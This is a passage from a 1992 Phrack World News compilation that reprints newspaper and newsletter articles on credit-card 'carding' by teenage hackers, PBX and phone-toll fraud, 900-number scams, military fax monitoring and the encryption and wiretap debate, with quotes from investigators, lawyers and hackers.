make fraudulent credit-card purchases. Detectives have seized a personal computer and other materials, and arrests are pending in San Diego and other parts of the country. "Half the time, it's feeding on people's stupidity," the anonymous hacker said, boasting that most computers can be cracked as easily as popping a beer. Hackers seem full of such bravado. In their electronic messages and in interviews, they exaggerate and swagger. One message traveling the clandestine network notes: "This text file contains extremely damaging material about the American Express account making algorithm. I do not commit credit card fraud. I just made up this scheme because I was bored. They form groups with names like "Legion of Doom" and "Masters of Deception," and give themselves nicknames like Phiber Optik, Video Vindicator and Outlaw. They view themselves as members of a computer underground, rife with cat-and- mouse intrigue. For the most part, they are bring teenagers who are coming of age in a computer-crazy world. Perhaps a generation ago, they tested their anti- authoritarian moxie by shoplifting or stripping cars. But, as it has with just about everything else, the computer has made teenage rebellion easier. Nowadays, a teenager tapping on a keyboard in the comfort of his bedroom can trespass on faraway corporate computers, explore credit files and surf coast- to-coast on long-distance telephone lines. San Diego police say that gathering details from computerized files as credit- reporting agencies, hackers around the country have racked up millions of dollars in fraudulent charges -- a trick known as "carding." Conventual notions of right and wrong seem to go fuzzy in the ethereal realm that hackers call cyberspace, and authorities say the number of crimes committed by computer is exploding nationwide. Like many hackers, the callers says he's paranoid. He won't give his name and refuses to meed in person. Now a college student in San Diego, he says, he began hacking when he was 13, collecting data by computer like a pack rat. "I wanted to know how to make a bomb," he said with a laugh. Like other hackers, he believes their strange underground community is misunderstood and maligned. Small wonder. They speak a specialized jargon of colons, slashes and equal signs. They work compulsively -- sometimes obsessively -- to decipher and decode, the hacker equivalent of breaking and entering. They exploit loopholes and flaws so they can flaunt their techno-prowess. "The basis of worth is what you know," the hacker says. "You'll hear the term 'lame' slung around a lot, especially if someone can't do too much." They exchange credit-card numbers by electronic mail and on digital bulletin boards set up on personal computers. They trade computer access codes, passwords, hacking techniques and other information. But it's not as if everyone is a criminal, the anonymous hacker says. What most people don't realize, he say, is how much information is out there -- "and some people want things for free, you know?" The real question for a hacker, he says, is what you do with the information once you've got it. For some, restraint is a foreign concept. RICH IN LORE Barely 20 years old, the history of hacking already is rich in lore. For example, John Draper gained notoriety by accessing AT&T long distance telephone lines for free by blowing a toy whistle from a bod of Cap'n Crunch cereal into the telephone. Draper, who adopted "Captain Crunch" as his hacker nickname, improved on the whistle with an electronic device that duplicated the flute like, rapid-fire pulses of telephone tones. Another living legend among hackers is a New York youth known as "Phiber Optik." "The guy has got a photographic memory,' said Craig Neidorf of Washington, who co-founded an underground hacker magazine called Phrack. "He knows everything. He can get into anything." Phiber Optik demonstrated his skills during a conference organized by Harper's Magazine, which invited some of the nation's best hackers to "log on" and discuss hacking in an electronic forum. Harper's published a transcript of the 11-day discussion in it's March 1990 issue. One of the participants, computer expert John Perry Barlow, insulted Phiber Optik by saying some hackers are distinguished less by their intelligence than by their alienation. "Trade their modems for skateboards and only a slight conceptual shift would occur," Barlow tapped out in his message. Phiber Optik replied 13 minutes later by transmitting a copy of Barlow's personal credit history, which Harper's editors noted apparently was obtained by hacking into TRW's computer records. For people like Emmanuel Goldstein, true hacking is like a high-tech game of chess. The game is in the mind, but the moves are played out across a vast electronic frontier. "You're not going to stop hackers from trying to find out things," said Goldstein, who publishes 2600 Magazine, the hacker quarterly, in Middle Island, New York. "We're going to be trying to read magnetic strips on cards," Goldstein said. "We're going to try to figure out how password schemes work. That's not going to change. What has to change is the security measures that companies have to take." ANGELHEADED HIPSTERS True hackers see themselves, in the words of poet Allen Ginsberg, as "Angelheaded hipsters burning for the ancient heavenly connection to the starry dynamo in the machinery of night." These very words were used by Lee Felsenstein, designer of the Osborne-1 computer and co-founder of the Homebrew Computer Club. But security consultants and law enforcement officials say malicious hackers can visit havoc upon anyone with a credit card or driver's license. "Almost none of it, I would say less than 10 percent, has anything to do with intellectual exploration," said Gail Thackeray, a Phoenix prosecutor who has specialized in computer crimes. "It has to do with defrauding people and getting stuff you want without paying for it." Such crimes have mushroomed as personal computers have become more affordable and after the break up of AT&T made it more difficult to trace telephone calls, Thackeray said. Even those not motivated by financial gain show a ruthlessness to get what they want, Thackeray said. "They'll say the true hacker never damages the system he's messing with," Thackeray said, "but he's willing to risk it." Science-fiction writer Bruce Sterling said he began getting anonymous calls from hackers after an article he wrote about the "CyberView 91" hacker convention was published in Details Magazine in October. The caller's were apparently displeased with Sterling's article, which noted, among other things, that the bustling convention stopped dead for the season's final episode of "Star Trek: The Next Generation." "They were giving me some lip," Sterling said. They showered him with invective and chortled about details from Sterling's personal credit history, which they had gleaned by computer. They also gained access to Sterling's long distance telephone records, and made abusive calls to many people who has spoken to Sterling. "Most of the news stories I read simplify the problem to the point of saying that a hacker is a hacker is a hacker," said Donn Parker, a computer security consultant with SRI International in Menlo Park. "In real life, what we're dealing with is a very broad spectrum of individuals," Parker says. "It goes all the way from 14-year olds playing pranks on their friends to hardened juvenile delinquents, career criminals and international terrorists." Yet true hackers have their own code of honor, Goldstein says. Computer trespassing is OK, for example, but altering or damaging the system is wrong. Posing as a technician to flim-flam access codes and passwords out of unsuspecting computers users is also OK. That's called "social engineering." "They're simply exploring with what they've got, weather it's exploring a haunted house or tapping into a mainframe," Goldstein said. "Once we figure things out, we share the information, and of course there are going to be those people that abuse that information," Goldstein added. It is extremely easy to break into credit bureau computers, Goldstein says. But the privacy being violated belongs to individual Americans -- not credit bureaus. If anything, credit bureaus should be held accountable for not providing better computer security, Goldstein argues. _______________________________________________________________________________ Companies Fall Victim To Massive PBX Fraud April 20, 1992 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Barbara E. McMullen & John F. McMullen (Newsbytes) NEW YORK CITY -- Appearing on the WBAI radio show "Off The Hook," New York State Police senior investigator Donald Delaney discussed the movement of organized crime groups into telecommunications fraud and warned the public of the dangers of such practices as "shoulder surfing." Delaney said that corporations are being victimized to the tune of millions of dollars by unauthorized persons "outdialing" through their private branch exchanges (PBXs). He traced the case of Data Products, a computer peripheral firm, that did not even seem aware that calls could be routed from the outside through their switchboard to foreign countries. It was only, according to Delaney, when it received a monthly telephone bill of over $35,000 that it perceived a problem. "It was at 5:10 PM on a certain date that Liriano finally, after weeks of trying, was able to obtain an outside dial tone on Data Products 800 number. Subsequent investigation showed that thousands of calls using a 9600 baud modem as well as manually placed calls had been made to the 800 number. At 7:30 the same evening, a call using the Data Products number was placed to the Dominican Republic from a telephone booth near Liriano's house. Within a few hours, calls were placed from phones all around the neighborhood -- and, within a week, calls began being placed from booths all around Manhattan," Delaney related. Phiber Optik, another studio guest and a convicted computer intruder previously arrested by Delaney, commented, "I'm glad that Mr. Delaney didn't refer to these people as hackers, but identified them for what they are: Sleezy common criminals. What these people are doing requires no super computer knowledge nor desire to learn. They are simply using computers and telephones to steal." Delaney agreed, saying, "The people actually selling the calls, on the street corner, in their apartments, or, in the case of cellular phones, in parked cars, don't have to know anything about the technology. They are given the necessary PBX numbers and codes by people higher up in the group and they just dial the numbers and collect the money. In the case of the re-chipped or clone cellular phones, they don't even have to dial the numbers." Delaney added, "These operations have become very organized very rapidly. I have arrested people that have printed revenue goals for the current month, next six months, and entire year -- just like any other franchise operation. I'm also currently investigating a murder of a call-seller that I arrested last October. He was an independent trying to operate in a highly organized and controlled section of Queens. His pursuit of an independent career may well have been responsible for his death." Off The Hook host Emmanuel Goldstein asked Delaney what responsibility that the PBX companies bear for what seems to be rather easy use of their systems for such activity. Delaney responded that he thought that the companies bear at least an ethical and moral responsibility to their clients to insure that they are aware of their exposure and the means that they must take to reduce the exposure. "As far as criminal and civil responsibility for the security of the system, there are no criminal statues that I am aware of that would hold the PBX companies criminally liable for failure to insure proper security. On the civil side, I think that the decision in the AT&T suit about this very topic will shed some light of legal responsibility." Goldstein also brought up the difficulties that some independent "customer- owned coin-operated" telephones (COCOTs) cause for customers. "The charges are often exorbitant, access to AT&T via 10288 is sometimes blocked, there is not even the proper access to 911 on some systems, and some either block 800 calls or actually try to charge for the connection to the 800 numbers. "We've even found COCOTs that, on collect calls, put the charges through when an answering machine picks up and the caller hangs up after realizing that no one is home. They are set up to start billing if a human voice is heard and the caller doesn't hang up within 5 or 10 seconds." Delaney agreed that the COCOTS that behave in this fashion are an ongoing problem for unsuspecting users, but said that he has received no complaints about illegal behavior. He said, however, that he had received complaints about fraudulent operation of 540 numbers -- the local New York equivalent of a 900 number. He said "most people don't realize that a 540 number is a chargeable number and these people fall victim to these scams. We had one case in which a person had his computer calling 8,000 phone numbers in the beeper blocks each night. The computer would send a 540 number to the beepers. People calling the number would receive some innocuous information and, at the end of the month a $55 charge on her/his telephone bill." Delaney continued, "The public has much to be worried about related to telephone fraud, particularly in New York City which can be called "Fraud Central, USA." If you go into the Port Authority Bus Terminal and look up in the balcony, you will see rows of people "shoulder surfing" with binoculars. They have binoculars or telescopes trained on the public telephones. When they see a person making a credit card call, they repeat the numbers into a tape recorder. The number is then sold and, within a few days, it is in use all around the city. People should always be aware of the possibility of shoulder surfers in the area." Goldstein returned to the 540 subject, pointing out that "because so many people don't realize that it is a billable number, they get caught by ads and wind up paying for scam calls. We published a picture in 2600 Magazine of a poster seen around New York, advertising apartment rental help by calling a 540 number. In very tiny print, almost unreadable, it mentions a charge. People have to be very careful about things like this." Delaney agreed, saying, "The 540 service must say within the first 10 seconds that there is a charge, how much it is, and that the person can hang up now without being charged -- the guy with the beeper scam didn't do that and that was one of the reasons for his arrest. Many of the services give the charge so fast and mix it in with instructions to stay on for a free camera or another number to find out about the vacation that they have won that they miss the charges and wind up paying. The 540 person has, although he may be trying to defraud, complied with the letter of the law and it might be difficult to prosecute him. The average citizen must therefore be more aware of these scams and protect themselves." Goldstein, Phiber Optik, and Delaney spent the remainder of the show answering listener questions. Off The Hook is heard every Wednesday evening on New York City's WBAI (99.5 FM). Recent guests have included Mike Godwin, in-house counsel of the Electronic Frontier Foundation; and Steve Jackson, CEO of Steve Jackson Games. _______________________________________________________________________________ Changing Aspects Of Computer Crime Discussed At NYACC May 15, 1992 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Barbara E. McMullen (Newbytes) New York City -- Donald Delaney, New York State Police senior investigator, and Mike Godwin, in-house counsel, Electronic Frontier Foundation (EFF), speaking to the May meeting of the New York Amateur Computer Club (NYACC), agreed that the entrance of organized crime into telecommunications fraud has made the subject of computer crime far different than that discussed just a year ago at a similar meeting. Newsbytes New York bureau chief John McMullen, moderating the discussion, recalled that Delaney in last year's appearance had called for greater education of law enforcement officers in technological areas, the establishment of a New York State computer crime lab, outreach by law enforcement agencies to the public to heighten awareness of computer crime and the penalties attached -- items that have all come to pass in the ensuing 12 months. He also mentioned that issues involving PBX & cellular phone fraud, privacy concerns and ongoing debate over law enforcement wiretapping & decryption capabilities have replaced the issues that received most of the attention at last year's meeting. Delaney agreed with McMullen, saying that there has been major strides made in the education of law enforcement personnel and in the acquisition of important tools to fight computer crime. He said that the practice of "carding" -- the purchasing of goods, particularly computer equipment, has become a much more major problem than it was a year ago and that many more complaints of such activities are now received. He added that "call-selling" operations, the making of international telephone calls to foreign countries for a fee, through the fraudulent use of either a company's private branch exchange (PBX) or an innocent party's cellular phone account, has become so lucrative that arrested suspects have told him that "they are moving from drug sales to this type of crime because it is less dangerous and more rewarding." Delaney pointed out, however, that one of his 1991 arrests had recently been murdered, perhaps for trying to operate as an independent in an area that now seems to be under the control of a Columbian mob "so maybe it's not going to continue to be less dangerous." Delaney also said that PBX fraud will continue to be a problem until the companies using PBX systems fully understand the system capabilities and take all possible steps to insure security. "Many firms don't even know that their systems have out-dialing capabilities until they get it with additional monthly phone charges of upwards of $35,000. They don't realize that the system has default passwords that are supposed to be changed," he said, "It finally hits some small businesses when they are bankrupted by the fraudulent long-distance charges." Godwin, in his remarks, expressed concern that there is not sufficient recognition of the uniqueness of BBS and conferencing systems and that, therefore, legislators possibly will make decisions based on misunderstandings. He said "Telephone conversations, with the exception of crude conference call systems are 'one-to-one' communications. Newspapers and radio & telephone are "one-to-many" systems but BBS" are "many-to-many" and this is different. EFF is interested in seeing that First Amendment protection is understood as applying to BBSs." He continued "We also have a concern that law enforcement agencies will respond to the challenges of new technology in inappropriate ways. The FBI and Justice Department, through the 'Digital Telephony Initiative' have requested that the phone companies such at AT&T and Sprint be required to provide law enforcement with the a method of wire-tapping in spite of technological developments that make present methods less effective. "Such a procedure would, in effect, make the companies part of the surveillance system and we don't think that that is their job. We think that it is up to law enforcement to develop their own crime-fighting tools. When the telephone was first developed it made it more difficult to catch crooks. They no longer had to stand around together to plan foul deeds; they could do it by telephone. Then the government discovered wiretapping and was able to respond. "This ingenuity was shown again recently when law enforcement officials, realizing that John Gotti knew that his phones were tapped and discussed wrongdoings outdoors in front of his house, arranged to have the lampposts under which Gotti stood tapped. That, in my judgement, is a reasonable approach by law enforcement." Godwin also spoke briefly concerning the on-going debate over encryption. "The government, through varies agencies such as NSA, keeps attempting to restrict citizens from cloaking their computer files or messages in seemingly unbreakable coding. We think that people have rights to privacy and, should they wish to protect it by encoding computer messages, have a perfect right to do so." Bruce Fancher, sysop and owner of the new New York commercial BBS service, MindVox, and the last speaker in the program, recounted some of his experiences as a "hacker" and asked the audience to understand that these individuals, even if found attached to a computer system to which they should not legitimately access, are not malicious terrorists but rather explorers. Fancher was a last minute replaced for well-known NY hacker Phiber Optik who did not speak, on the advice of his attorney, because he is presently the subject of a Justice Department investigation. During the question and answer period, Delaney suggested that a method of resolving the encryption debate would be for third parties, such as banks and insurance companies, to maintain the personal encryption key for those using encryption. A law enforcement official would then have to obtain a judge's ruling to examine or "tap" the key for future use to decipher the contents of the file or message. Godwin disagreed, saying that the third party would then become a symbol for "crackers" and that he did not think it in the country's best interests to just add another level of complexity to the problem. The question and answer period lasted for about 45 minutes with the majority of questions concerning encryption and the FBI wiretap proposal. _______________________________________________________________________________ Couple Of Bumbling Kids April 24, 1992 ~~~~~~~~~~~~~~~~~~~~~~~ By Alfred Lubrano (Newsday) Two young Queens computer hackers, arrested for the electronic equivalent of pickpocketing credit cards and going on a computer shopping spree, will be facing relatively minor charges. Rudolph Loil, age 17, of Woodside, charged with attempted grand larceny, was released from police custody on a desk appearance ticket, a spokesman for the Queens district attorney's office said. A 15-year-old friend from Elmhurst who was also arrested was referred to Queens Family Court, whose proceedings are closed, the spokesman said. He was not identified because of his age. Law-enforcement sources said they are investigating whether the two were "gofers" for adults who may have engaged them in computer crime, or whether they acted on their own. But Secret Service officials, called into the matter, characterized the case as "just a couple of bumbling kids" playing with their computer. The youths were caught after allegedly ordering $1,043 in computer equipment with a credit card number they had filched electronically from bank records, officials said. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Hackers April 27, 1992 ~~~~~~~ Taken from InformationWeek (Page 8) Two teenagers were arrested last week in New York for using computers to steal credit card and telephone account numbers and then charging thousands of dollars worth of goods and phone calls to the burgled accounts. The two were caught only after some equipment they had ordered was sent to the home of the credit card holder whose account number had been pilfered. Their arrests closely follow the discovery by the FBI of a nationwide ring of 1,000 computer criminals, who charge purchases and telephone calls to credit card and phone account numbers stolen from the Equifax credit bureau and other sources. The discovery has already led to the arrest of two Ohio hackers and the seizure of computer equipment in three cities. _______________________________________________________________________________ DOD Gets Fax Evesdroppers April 14, 1992 ~~~~~~~~~~~~~~~~~~~~~~~~~ By Joseph Albright (Atlanta Journal and Constitution)(Page A12) Washington -- The Air Force is buying a new weapon to battle leaks: A $30,000 portable fax-tapper. Whenever someone transmits a fax, the fax-tapping device attached to the phone line will sneak an electronic copy and store it in a laptop computer's memory. Each of the new devices will enable an Air Force intelligence officer to monitor four telephones for "communications security" violations. Susan Hansen, a Defense Department spokeswoman, said last week that "there is no plan right at the moment" to install the devices in the Pentagon, whose top leaders have been outraged in recent weeks by leaks of classified policy documents to reporters. But she left open the possibility that some of them will be attached to sensitive military fax lines when the tapping devices are delivered to the Air Force six months to a year from now. "There are a lot of things that are under review here," she said after consulting with the Pentagon's telecommunications office. Plans to buy 40 of the devices were disclosed a few weeks ago in a contract notice from a procurement officer at Wright-Patterson Air Force Base near Dayton, Ohio. When contacted, a spokesman referred inquiries to the Air Force Intelligence Command at Kelly Air Force Base, Texas, which authorized the purchase. The Air Force Intelligence Command insisted that the devices will never be used for law enforcement purposes or even "investigations." "The equipment is to be used for monitoring purposes only, to evaluate the security of Air Force official telecommunications," said spokesman Dominick Cardonita. "The Air Force intelligence command does not investigate." Mr. Cardonita said that, for decades, Air Force personnel in sensitive installations have been on notice that their voice traffic on official lines is subject to "communications security" monitoring. The fax-tapper simply "enhances" the Air Force's ability to prevent "operational security" violations, he said. He estimated that the Air Force will pay $1.2 million under the contract, due to be let this June. That averages out to $ 30,000 for each fax-tapper, but Mr. Cardonita said the price includes maintenance and training. Douglas Lang, president of Washington's High Technology Store and an authority on security devices, said that, so far as he knows, the Air Force is the first government agency to issue an order for fax-tapping machines. Mr. Lang said he has heard from industry sources that 15 contractors have offered to sell such devices to Wright-Patterson. "It is one more invasion of privacy by Big Brother," declared Mr. Lang, who predicted that the Air Force will use the devices mainly to catch anyone trying to leak commercially valuable information to contractors. Judging from the specifications, the Air Force wants a machine that can trace leaks wherever they might occur. Mr. Cardonita said the Air Force Intelligence Command will use the devices only when invited onto an Air Force base by a top commander. _______________________________________________________________________________ 900-Number Fraud Case Expected to Set a Trend April 2, 1992 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By David Thompson (Omaha World-Herald) Civil court cases against abuses of 900-toll telephone number "will be slam dunks" as the result of the successful prosecution of a criminal case in Omaha over 900 numbers, a federal postal inspector said. Postal inspector Michael Jones said numerous civil actions involving 900 numbers have been filed, including three recently in Iowa. At least one civil case is pending in Nebraska, he said, and there may be others. Jones said the mail fraud conviction of Bedford Direct Mail Service Inc. of Omaha and its president, Ellis B. Goodman, 52, of 1111 South 113th. Court, may have been the first criminal conviction involving 900 numbers. The conviction also figures in Nebraska Attorney General Don Stenberg's consumer protection program, which calls attention to abuses of 900 numbers, a staff member said. Among consumer complaints set to Stenberg's office, those about 900 numbers rank in the top five categories, said Daniel L. Parsons, senior consumer protection specialist. People are often lured by an offer of a gift or prize to dial a toll-free 800 number, then steered to a series of 900 numbers and charged for each one, Parsons said. He said that during the last two years, state attorneys general have taken action against 150 organizations for allegedly abusing 900 numbers. _______________________________________________________________________________ ==Phrack Inc.== Volume Four, Issue Thirty-Nine, File 11 of 13 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Phrack World News PWN PWN PWN PWN Issue XXXIX / Part Two of Four PWN PWN PWN PWN Compiled by Datastream Cowboy PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN The Charge Of The Carders May 26, 1992 ~~~~~~~~~~~~~~~~~~~~~~~~~ By Joshua Quittner ( Newsday)(Page 45) Computer criminals are after your credit-card numbers -- to steal with, sell and swap. THE KID, from Springfield Gardens, Queens, was a carder, of course. He was doing what carders do: trying to talk a salesman into overnight- expressing him a $4,000 computer system -- and using a stolen credit-card number for payment. The salesman was playing right along on the phone; he had also notified a co- worker to alert the New York State Police, said William Murphy, a customer service manager at Creative Computers, who described the event as it was unfolding on a recent Tuesday morning. Murphy said that on a typical day, as many as a dozen times, carders would call and try to buy everything from modems to whole computer systems. Murphy said that these days, the security people at Creative Computers are able to stop virtually all of them, either by not delivering the goods, or by delivering them UPS -- that's United Police Service. He sighed: "It's amazing that they even try." But try they do. And at other places, they're successful. Where once hacking into a credit bureau was a kind of rite of passage for computer intruders, who generally did little more than look up credit histories on people like Mike Dukakis, now computer criminals are mining national credit bureaus and mail- order houses, coming away with credit-card numbers to sell, swap or use for mail-order purchases. Underground electronic bulletin board systems help spread not only the passwords, but the techniques used to tap into different systems. In San Diego on April 30, for instance, police raided a bulletin board called Scantronics, which offered among other things, step-by-step manuals on how to hack into Equifax Credit Information Services and TRW Information Services, the largest credit bureaus in the nation, the San Diego Tribune reported. "The potential for fraud is enormous, it's almost limitless," said Joel Lisker, Mastercard International's vice president of security and risk management, who noted that computer intruders accessed "thousands" of credit-card account numbers in another recent case. MASTERCARD is putting together a task force of its bank members to address the problem, and is considering inviting hackers in to learn what they can do to tighten up computer access to credit bureaus, he said. Mastercard estimates it lost $57 million to counterfeit scams last year; Lisker said it is impossible to say how much carders contributed. But based on the volume of arrests lately, he figures carding has become a big problem. "It's kind of like a farmer that sees a rat," Lisker said. "If he sees one, he knows he has several. And if he sees several he knows he has a major infestation. This is a major infestation." "It's clearly something we should be concerned about," agreed Scott Charney, chief of the U.S. Justice Department's new Computer Crime Unit. Charney said that roughly 20 percent of the unit's current caseload involves credit-card fraud, a number that, if nothing else, colors the notion that all hackers are misunderstood kids, innocently exploring the world of computer networks. "Whether such noble hackers exist, the fact of the matter is we're seeing people out there whose motives are not that pure," he said. On May 11, New York State Police arrested three teenagers in Springfield Gardens when one of them went to pick up what he hoped was an Amiga 3000 computer system from Creative Computers, at a local UPS depot. "What he wanted was a computer, monitor and modem. What he got was arrested," said John Kearey, a state police investigator who frequently handles computer and telecommunications crimes. Police posed as UPS personnel and arrested the youth, who led them to his accomplices. Kearey said the teens said they got the stolen credit-card number from a "hacker who they met on a bridge, they couldn't remember his name" -- an interesting coincidence because the account number was for a next-door neighbor of one of the youths. Police suspect that the teens, who claimed to belong to a small hacking group called the MOB (for Men of Business) either hacked into a credit bureau for the number, got someone else to do it, or went the low-tech route -- "dumpster diving" for used carbon copies of credit receipts. Indeed, most credit-card fraud has nothing to do with computer abusers. Boiler-room operations, in which fast-talking con men get cardholders to divulge their account numbers and expiration dates in exchange for the promise of greatly discounted vacations or other too-good-to-be-true deals, are far and away the most common scams, said Gregory Holmes, a spokesman for Visa. But carders have an advantage over traditional credit-card cheats: By using their PCs to invade credit bureaus, they can find credit-card numbers for virtually anyone. This is useful to carders who pick specific credit-card numbers based on location -- a neighbor is out of town for a week, which means all you have to do is get his account number, stake out his porch and sign for the package when the mail comes. Another advantage is address and ZIP code verifications, once a routine way of double-checking a card's validity, are no longer useful because carders can get that information from an account record. "It's tough," Holmes said. "Where it becomes a major problem is following the activity of actually getting the credit-card number; it's sent out on the black market to a vast group of people" generally over bulletin boards. From there, a large number of purchases can be racked up in a short period of time, well before the cardholder is aware of the situation. While the cardholder is not liable, the victims usually are businesses like Creative Computers, or the credit-card company. Murphy said his company used to get burned, although he would not divulge the extent of its losses. "It happened until we got wise enough to their ways," he said. Now, with arrangements among various law enforcement agencies, telephone companies and mail carriers, as well as a combination of call-tracing routines and other verification methods, carders "rarely" succeed, he said. Also, a dozen employees work on credit-card verification now, he said. "I feel sorry for the companies that don't have the resources to devote departments to filter these out. They're the ones that are getting hit hard." In New York, federal, state and local police have been actively investigating carder cases. Computers were seized and search warrants served on a number of locations in December, as part of an ongoing federal investigation into carding. City police arrested two youths in Queens in April after attempting to card a $1,500 computer system from Creative Computers. They were arrested when they tried to accept delivery. "It's a legitimate way to make money. I know people who say they do it," claimed a 16-year-old Long Island hacker who uses the name JJ Flash. While he says he eschews carding in favor of more traditional, non-malicious hacking, JJ Flash said using a computer to break into a credit bureau is as easy as following a recipe. He gave a keystroke-by-keystroke description of how it's done, a fairly simple routine that involved disguising the carder's calling location by looping through a series of packet networks and a Canadian bank's data network, before accessing the credit bureau computer. Once connected to the credit bureau computer, JJ Flash said a password was needed -- no problem, if you know what underground bulletin boards to check. "It's really easy to do. I learned to do it in about thirty seconds. If you put enough time and energy into protecting yourself, you'll never get caught," he said. For instance, an expert carder knows how to check his own phone line to see if the telephone company is monitoring it, he claimed. By changing the location of a delivery at the last minute, he said carders have evaded capture. J J FLASH said that while most carders buy computers and equipment for themselves, many buy televisions, videocassette recorders and other goods that are easy to sell. "You can usually line up a buyer before its done," he said. "If you have a $600 TV and you're selling it for $200, you will find a buyer." He said that while TRW has tightened up security during the past year, Equifax was still an easy target. But John Ford, an Equifax spokesman, said he believes that hackers greatly exaggerate their exploits. He said that in the recent San Diego case, only 12 records were accessed. "It seems to me the notion that anybody who has a PC and a modem can sit down and break in to a system is patently untrue," he said. "We don't have any evidence that suggests this is a frequent daily occurrence." Regardless, Ford said his company is taking additional steps to minimize the risk of intrusion. "If one is successful in breaking into the system, then we are instituting some procedures that would render the information that the hacker receives virtually useless." Also, by frequently altering customers' passwords, truncating account information so that entire credit-card numbers were not displayed, and possibly encrypting other information, the system will become more secure. "We take very seriously our responsibility to be the stewards of consumer information," Ford said. But others say that the credit bureaus aren't doing enough. Craig Neidorf, publisher of Phrack, an underground electronic publication "geared to computer and telecommunications enthusiasts," said that hacking into credit bureaus has been going on, and has been easy to do "as long as I've been around." Neidorf said that although he doesn't do it, associates tell him that hacking into credit bureau's is "child's play" -- something the credit bureaus have been careless about. "For them not to take some basic security steps to my mind makes them negligent," Neidorf said. "Sure you can go ahead and have the kids arrested and yell at them, but why isn't Equifax or any of the other credit bureaus not stopping the crime from happening in the first place? It's obvious to me that whatever they're doing probably isn't enough." A Recent History Of Carding September 6, 1991: An 18-year-old American emigre, living in Israel, was arrested there for entering military, bank and credit bureau computers. Police said he distributed credit-card numbers to hackers in Canada and the United States who used them to make unknown amounts of cash withdrawals. January 13, 1992: Four university students in San Luis Obispo, California, were arrested after charging $250,000 in merchandise to Mastercard and Visa accounts. The computer intruders got access to some 1,600 credit-card accounts, and used the numbers to buy, among other things: Four pairs of $130 sneakers; a $3,500 stereo; two gas barbecues and a $3,000 day at Disneyland. February 13, 1992: Two teenagers were arrested when one of them went to pick up two computer systems in Bellevue, Wash., using stolen credit-card numbers. One told police that another associate had hacked into the computer system of a mail-order house and circulated a list of 14,000 credit-card numbers through a bulletin board. April 17, 1992: Acting on a tip from San Diego police, two teenagers in Ohio were arrested in connection with an investigation into a nationwide computer hacking scheme involving credit-card fraud. Police allege "as many as a thousand hackers" have been sharing information for four years on how to use their computers to tap into credit bureau databases. Equifax, a credit bureau that was penetrated, admits that a dozen records were accessed. April 22, 1992: Two Queens teens were arrested for carding computer equipment. _______________________________________________________________________________ Invading Your Privacy May 24, 1992 ~~~~~~~~~~~~~~~~~~~~~ By Rob Johnson (The Atlanta Journal and Constitution)(Page A9) Some do it for fun, others have more criminal intent. Regardless, computer users have a range of techniques and weaponry when breaking into files. "Rooting" forbidden files is hog heaven for hackers Within an instant, he was in. Voodoo Child, a 20-year-old college student with a stylish haircut and a well- worn computer, had been cruising a massive researchers' network called Internet when he stumbled upon a member account he hadn't explored for a while. The institution performed "Star Wars" research, he later found out, but that didn't interest him. "I don't know or care anything about physics," he said recently. "I just wanted to get root." And "getting root," hackers say, means accessing the very soul of a computer system. Working through the network, he started a program within the research institute's computers, hoping to interrupt it at the right moment. "I figured I just had a second," he said, gesturing with fingers arched above an imaginary keyboard. Suddenly he pounced on the phantom keys. "And it worked." He soon convinced the computer he was a system operator, and he built himself a back door to Internet: He had private access to exotic supercomputers and operating systems around the world. Before long, though, the Atlanta-area hacker was caught, foiled by an MCI investigator following his exploits over the long-distance phone lines. National security experts sweated over a possible breach of top-secret research; the investigation is continuing. And Voodoo Child lost his computer to law enforcement. "I was spending so much time on the computer, I failed out of college," he said. "I would hack all night in my room, go to bed and get up at 4 in the afternoon and start all over." In college, he and a friend were once discovered by campus police dumpster- diving behind the university computer building, searching for any scraps of paper that might divulge an account number or a password that might help them crack a computer. Now he's sweating it out while waiting for federal agents to review his case. "I'm cooperating fully," he said. "I don't want to go to prison. I'll do whatever they want me to." In the meantime, he's back in college and has taken up some art projects he'd abandoned for the thrill of computer hacking. The free-form days of computer hacking have definitely soured a bit -- even for those who haven't been caught by the law. "It's a lot more vicious," Voodoo Child said as a friend nodded in agreement. "Card kids" -- young hackers who ferret out strangers' credit card numbers and calling card accounts -- are wrecking the loose communal ethic that defined hacking's earlier, friendlier days. And other computer network users, he said, are terrified of the tactics of sophisticated hackers who routinely attack other computer users' intelligence, reputation and data. "I used to run a BBS [electronic bulletin board system] for people who wanted to learn about hacking," Voodoo Child said. "But I never posted anything illegal. It was just for people who had questions, who wanted to do it properly." Doing it properly, several Atlanta-area hackers say, means exploring the gaps in computer networks and corporate systems. They say it's an intellectual exercise -- and an outright thrill -- to sneak into someone else's computer. During a recent interview, Voodoo Child and a friend with a valid Internet account dialed up the giant network, where some of their counterparts were waiting for a reporter to ask them some questions. "Did you get that information on the Atlanta Constitution reporter you were asking about?" a faceless stranger asked. A startled reporter saw his credit report and credit card numbers flashed across the screen. Voodoo Child offered up the keyboard -- an introduction of sorts to a mysterious, intimidating accomplice from deep inside the digital otherworld. "Go ahead," he said. "Ask him anything you want." _______________________________________________________________________________ KV4FZ: Guilty Of Telephone Toll Fraud May 15, 1992 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By John Rice (rice@ttd.teradyne.com) in TELECOM Digest V12 #412 St. Croix ham operator, Herbert L. "Herb" Schoenbohm, KV4FZ, has been found guilty in federal court of knowingly defrauding a Virgin Islands long-distance telephone service reseller. He was convicted April 24th of possessing and using up to fifteen unauthorized telephone access devices in interstate and foreign commerce nearly five years ago. The stolen long distance telephone access codes belonged to the Caribbean Automated Long Lines Service, Inc. (CALLS) of St. Thomas, U.S. Virgin Islands. Schoenbohm was found to have made more than $1,000 in unauthorized telephone calls -- although the prosecution said he was responsible for far more. According to the Virgin Islands Daily News, Schoenbohm, who is also the St. Croix Police Chief of Communications, showed no emotion when he was pronounced guilty of the charges by a 12 member jury in U.S District Court in Christiansted. The case was heard by visiting District Judge Anne Thompson. Neither Schoenbohm or his defense attorney, Julio Brady, would comment on the verdict. The jury deliberated about seven hours. The sentencing, which has been set for June 26, 1992, will be handled by another visiting judge not familiar with the case. Schoenbohm, who is Vice Chairman of the V.I. Republican Committee, has been released pending sentencing although his bail was increased from 